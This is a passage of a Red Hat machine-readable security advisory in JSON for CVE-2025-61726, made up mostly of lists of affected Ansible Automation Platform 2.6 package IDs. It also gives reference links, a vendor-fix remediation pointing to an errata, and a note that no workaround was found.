"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T16:12:45+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
